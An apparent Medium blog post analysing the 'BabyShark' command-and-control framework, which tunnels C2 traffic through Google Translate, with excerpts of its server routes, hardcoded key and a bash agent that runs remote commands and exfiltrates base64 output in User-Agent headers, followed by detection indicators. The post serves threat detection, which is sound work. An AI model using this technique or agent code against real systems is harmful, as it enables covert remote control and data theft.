Understanding & Detecting C2 Frameworks — BabyShark

BabyShark

Google Translate as a proxy

https://translate.google.com/translate?&anno=2&u=[URL OF WEB PAGE]
It looks nice :D
Inspecting the source
https://y7t5ywjrrsywzq4aeo6x7rzg7u-b25orc35okxta-nasbench-medium-com.translate.goog/
Looks even better :D

C2 Server (app.py)

“BabyShark” main interface
Web Routes

home (“/”)

“/” Route
Results interface

getcommand (“/momyshark”)

“getcommand” Function
password = 'b4bysh4rk'
Redirect page
<meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=6aE0psDCIow">
Redirected YouTube video
result = request.headers.get('User-Agent').split('|')
if len(result) >= 2:
[Extract Results]
[Send Commands]
Mommy Shark ?
HTML source of Mommy Shark

create (“/create-task”)

“create” Function

done & delete

  • command (id, cmd, done)
  • results (id, results)
Database Tables
“done” Function
“delete” Function

Example Agent

“Agent.sh”
running=truesecretkey="b4bysh4rk"user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"data="Content-Hype: "c2server="http://babyshark/momyshark?key=$secretkey"result=""input="/tmp/input"output="/tmp/output"

namedpipe

“namedpipe” Function
input="/tmp/input"output="/tmp/output"

main

“main” Function

talktotranslate

“talktotranslate” Function

getfirsturl

“getfirsturl” Function
https://translate.google.com/translate?&anno=2&u=http://babyshark/momyshark?key=b4bysh4rk
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36

getsecondurl

“getsecondurl” Function
https://translate.googleusercontent.com/translate_p?anno=2&u=http://babyshark/momyshark?key=b4bysh4rk&depth=1&rurl=translate.google.com&sp=nmt4&pto=aue,ajax,boq&usg=[Random String]
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36

getcommand

HTML source of Mommy Shark
command=$(echo "$command" | xmllint --html --xpath '/html/body/main/div/div/div/div/ul/li/span/text()' - 2>/dev/null )echo $command
pwd # 1
Going back to main
# Extract the ID
idcommand=$(echo $command | cut -d '#' -f2)
# Send command to the named pipe for execution
echo "$command" > "$input"
# Sleep for 2 seconds
sleep 2
# Read the output from the file and encode it to Base64
outputb64=$(cat $output | tr -d '\000' | base64 | tr -d '\n' 2>/dev/null)
result="$user_agent | $outputb64 | $idcommand "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 | L2hvbWUvbi90b29scy9CYWJ5U2hhcmsK | 1
  1. The agent start by creating a named pipe and output file to save / execute commands sent by the C2.
  2. Send a request to google translate with the C2 server as a web page by calling the “talktotranslate” function.
  3. Receives the new URL for the “translated” C2.
  4. Extract the command from the HTML source.
  5. Send the command to the named pipe for execution.
  6. Encode the output to Base64.
  7. Concatenate the USER-AGENT with OUTPUT and ID.
  8. Request the “google-translate” server using the newly generated USER-AGENT.
  9. Repeat until it receives “exit” command.

Conclusion

Indicators

  • User-Agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
  • “/tmp/input” & “/tmp/output” will be created on infected hosts
  • 10 second delay by default between the different batch of requests to Google translate
  • URL : “C2_IP/momyshark?key=”
  • Default Secret Key : b4bysh4rk
  • Binaries executed : “curl”, “base64”, “xmllint”, “mkfifo”, “cut”, “tr”, “sed”, “echo”, “cat” (See source above for arguments)

MITRE ATT&CK

--

--

--

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

See errors through the user’s eyes:How Onvey.io

Event sourcing essentials you need to know when starting out

Apache Hive dealing with different data file

Certification: Mission accomplished

Credito-The Credit Doctor

Easy Java Swing exercise: Tip calculator

Bob Wicks will triangular terminate now

“If it turns out that this is incurable, would you marry me?”

Get the Medium app

Nasreddine Bencherchali

Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

More from Medium

Creating Malicious .wms Files — Malware Mondays #3

SOC141 — Phishing URL Detected Alert Walkthrough

PowerShell Empire — Threat Hunting with Splunk

Methodology for Malware Static analysis : Portable Executable (PE) files